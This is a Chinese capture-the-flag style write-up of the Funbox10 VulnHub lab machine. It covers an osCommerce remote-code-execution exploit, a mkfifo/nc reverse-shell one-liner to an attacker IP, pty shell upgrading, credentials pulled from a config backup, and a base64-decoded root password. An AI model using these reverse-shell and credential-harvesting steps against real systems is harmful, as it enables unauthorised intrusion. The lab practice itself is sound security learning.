Funbox10靶机详解

Funbox10靶机详解

最难的就是反弹shell,学会了一些新的反弹shell命令。

靶机下载地址:https://download.vulnhub.com/funbox/Funbox10.ova

我wget能下载文件的原因是我在kali上开启了apache2服务,常用文件放一起就好了。

service apache2 start

这个靶机扫描ip并没有什么有用的东西,就不展示了。

扫目录时候发现一个/catalog目录。

image-20230721190006321

进去后发现有点像一个CMS,就去搜索了一下有没有漏洞。

image-20230721190025898

没想到一搜全是漏洞。

searchsploit oscommerce

image-20230721190209174

下载了一个远程执行漏洞。

image-20230721190321923

看了一下源码说是有两个参数,并且参数必须严格这个格式,

image-20230721190350039

执行后发现拿到一个shell,但是这个shell权限很低,命令都不能用,就像做一个反弹shell

但是试了很多命令都不行。

就下面这个命令执行成功了。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.102.129 8888 >/tmp/f

image-20230721190530150

拿到shell以后执行:

pyhton3 -c "import pty;pty.spawn('/bin/bash')"

image-20230721190521207

ls查看一下,在当前目录下,找到了configure.php.bak文件,里面有一个jack用户的账号密码,su一下就登陆上了。

image-20230721191340594

但进去这个用户后其实也没啥东西,很难找到东西。

我们可以利用pspy64查看执行的进程,需要自己下载。

wget 192.168.102.129/pspy64

image-20230721191625059

加一个执行权限,然后执行。

image-20230721191714746

发现每隔一段时间就会执行一个文件。

image-20230721191746790

我们进去这个目录看看,cat一下发现点线索,一看这就是一个base64编码的。

/usr/share/doc/examples/

image-20230721192135616

解码一下发现是root的密码。

-u root -p rfvbgt!!

image-20230721192207528

成功拿到root权限。

image-20230721192247280

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值